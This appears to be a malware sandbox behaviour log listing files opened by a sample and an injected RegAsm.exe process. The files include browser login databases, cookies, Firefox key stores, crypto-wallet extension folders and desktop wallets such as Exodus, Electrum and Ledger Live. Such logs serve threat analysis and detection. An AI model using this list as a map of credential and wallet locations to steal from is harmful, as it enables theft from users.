Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\signons.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
